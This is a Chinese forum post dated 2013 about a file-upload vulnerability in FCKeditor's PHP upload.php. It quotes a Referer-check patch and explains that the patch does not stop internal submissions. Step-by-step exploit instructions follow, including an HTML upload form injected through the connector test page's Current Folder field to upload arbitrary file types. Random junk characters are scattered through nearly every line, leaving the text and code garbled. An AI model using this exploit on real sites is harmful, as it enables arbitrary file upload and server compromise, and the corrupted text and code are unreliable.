漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
i9 ?4 Y8 P- z& y# D- v网上给出的修复方案是- B+ v) _* T% w" m$ F1 W! t' n
修复方法,删除FCK编辑器用其他的编辑器, E: G" | P4 S$ l8 i9 b9 c( [
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件/ c w- o3 c3 k( E2 f, v; m
在' [( l6 ^0 g% |6 a
require(‘config.php’);$ v9 d$ ]% f! x* h. h- Y6 D$ }9 `
require(‘util.php’);8 g l( d2 F% E! V$ j9 l
的下面添加以下代码—————————–, D+ S/ Z6 ]4 o/ x
//防止外部提交
# K6 [$ L5 L0 C; U$ Ufunction outsidepost()
) ^8 W( p6 }5 o5 i% |" I) k; t{
a1 g5 X3 x2 v$servername=$_SERVER['SERVER_NAME'];
8 U/ x, ~) \; t e( {2 ^3 k; U$sub_from=@$_SERVER['HTTP_REFERER'];
; x2 b5 f% V4 Q( J7 a$sub_len=strlen($servername);* b; G2 W2 @, {; z4 k
$checkfrom=substr($sub_from,7,$sub_len);
]# O; I1 c0 \& O! i" Iif($checkfrom!=$servername){5 F; g0 _ s, B. M$ d8 l
echo(“you don’t outsidepost!”);8 z0 `) u/ _/ a, Q. z& _8 m
exit;) G: z- S5 l2 O0 t% }: R! ?$ A
}
% A3 Q+ R2 U' p}$ f* B& k5 h2 j4 p" V$ w
outsidepost();
# d0 T, K0 z- Q( h防止外部提交,但是没有防止内部提交,
3 i" ]; R2 X% w利用方法:
% j0 t7 h3 _+ B( k! g1 q$ K1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html. t5 O( q& s; B9 Y9 _3 T8 J
2,在Current Folder 框输入3 O2 ], F8 J3 R8 p, T9 N9 `
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
) Y. x2 `+ U- {然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
& g) d ~ v7 ]9 Z z% pPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对